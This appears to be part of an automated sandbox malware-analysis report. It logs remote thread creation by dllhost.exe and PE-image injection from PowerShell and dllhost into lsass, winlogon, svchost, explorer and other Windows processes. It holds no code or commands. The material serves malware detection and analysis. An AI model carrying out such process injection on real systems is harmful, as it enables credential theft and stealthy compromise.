Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: BF25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: D825AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: DA25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 11725AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 11925AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 7B25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 7D25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 5F25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 6125AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 5D25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 5F25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: F425AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: F625AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 12325AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 12525AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: C525AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: C725AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 7B25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 7D25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 10325AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 10525AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9925AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 9B25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 11525AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 11725AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: EF25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: F125AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: FD25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: FF25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: C825AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: D525AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 6425AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 6625AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 12E25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 13725AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 11E25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 12025AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 6125AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 6325AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: C525AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: C725AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: C325AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: C525AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 14325AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 14525AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: D325AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: D525AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 6625AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 6825AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: BD25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: BF25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 13F25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 14125AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 12825AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 12A25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: F125AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: F325AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: D625AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: D825AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 5025AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 5225AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: EA25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: EC25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 3925AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 3B25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 8F25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 7B25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 7D25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 10225AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 10425AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 13E25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 14025AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: E425AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: E625AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 13F25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 14125AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 11325AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 11525AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 13425AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 14625AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 14825AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 7525AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 7725AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 13725AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 13525AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 6E25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 7025AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: D025AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: D225AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: C525AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: CB25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 7725AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 7925AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 5E25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 7E25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: AF25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: AD25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 5E25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 7B25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 7E25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: D325AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: AF25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: AD25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: FC25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 7B25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 10025AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: D325AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 5D25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: FC25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 10025AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 7625AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 5D25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 11425AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: C825AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 12525AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 7625AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: BD25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 11425AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 12525AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 14125AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: BD25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: A725AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 14125AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: E125AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: A725AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 6E25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 7025AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: D725AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: D925AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: F825AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: FA25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: D725AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: DD25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 167A2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 167D2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 23BC2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 23BF2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 81C2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 8E32EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: A5E72EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: A5EA2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 17762EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 186A2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\wbem\WMIADAP.exe EIP: 52A12EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\wbem\WMIADAP.exe EIP: 52A12EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 56425AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 2E825AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 30B25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 34D25AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 7925AC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: D0DE2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: F0B92EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: D0F72EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\Conhost.exe EIP: 3D02EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 36152EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: 50472EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: FB052EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: FB052EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\Conhost.exe EIP: E5672EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: FD322EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: C8FA2EBC
Source: C:\Windows\System32\dllhost.exe	Thread created: unknown EIP: CB042EBC

Injects a PE file into a foreign processes

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe base: 400000 value starts with: 4D5A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\System32\dllhost.exe base: 140000000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\winlogon.exe base: 225DC610000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\lsass.exe base: 202C0AB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2A6612D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dwm.exe base: 2BAAED90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\winlogon.exe base: 225DC610000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\lsass.exe base: 202C0AB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2A6612D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dwm.exe base: 2BAAEDC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 26A87990000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 17953770000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2295D530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 253067D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1845B370000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 26A87990000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 17953770000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2295D530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 253067D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1845B3A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1ADEBFD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1ADECD40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D559040000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D559070000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 241A9E70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1CD73160000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2824E860000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 21B473C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 241A9E70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1CD73160000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2824E860000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 21B47B30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2086F9D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 20870060000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 17183BC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 23FD3F70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 17183BC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 23FD3FA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D2A4150000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D2A4180000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 275BDF30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 275BDF60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1AAC0260000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 203C9F30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B5645B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1BB7B2A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1C004F60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 24E2AB40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2644ADB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\spoolsv.exe base: 1990000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 20D25DA0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 26EF5350000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2A7F0D60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 23D0FFB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B1C2570000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2108BCF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 29166900000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13FF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1988D570000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 13869B40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1AAC0260000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1E1CC740000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 203C9F30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2855DA70000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B5645B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2BF199D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1BB7B2A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 15AF3890000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1C004F60000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 21A03B80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 24E2AB40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\sihost.exe base: 1CD40E40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 151A6530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 19E29CC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 17D7B150000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1BE621A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2252F480000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 23D0FFB0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\ctfmon.exe base: 1F28B540000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B1C2570000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 184683D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2108BCF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\explorer.exe base: 9070000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1972E260000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Program Files\Common Files\microsoft shared\ClickToRun\OfficeClickToRun.exe base: 21C13FF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dasHost.exe base: 2246C5E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1988D570000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 221D5930000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 13869B40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC650000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1D1777C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1A633B40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2928D0A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 15AF3890000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dllhost.exe base: 13DAB4C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 21A03B80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\smartscreen.exe base: 1A22A640000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\sihost.exe base: 1CD40E40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 21C6CF30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 151A6530000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\audiodg.exe base: 1D349350000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 19E29CC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 23B602E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 17D7B150000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1BE621A0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1F22F7C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 2252F480000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\ApplicationFrameHost.exe base: 1F6E8150000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\ctfmon.exe base: 1F28B540000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 20C52340000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 184683D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DA90000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\explorer.exe base: 9070000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1972E260000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dasHost.exe base: 2246C5E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1ECFC650000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 1D1777C0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1A633B40000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 21C6CF30000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 23B602E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2135E7B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\ImmersiveControlPanel\SystemSettings.exe base: 2589DAC0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\oobe\UserOOBEBroker.exe base: 1F5602E0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\wbem\WmiPrvSE.exe base: 2045C3B0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 23023330000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1A71C3D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dllhost.exe base: 1B6BA880000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\conhost.exe base: 1FA5FEF0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\RuntimeBroker.exe base: 2694B1D0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1D2E0060000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dllhost.exe base: 1B6BA880000 value starts with: 4D5A
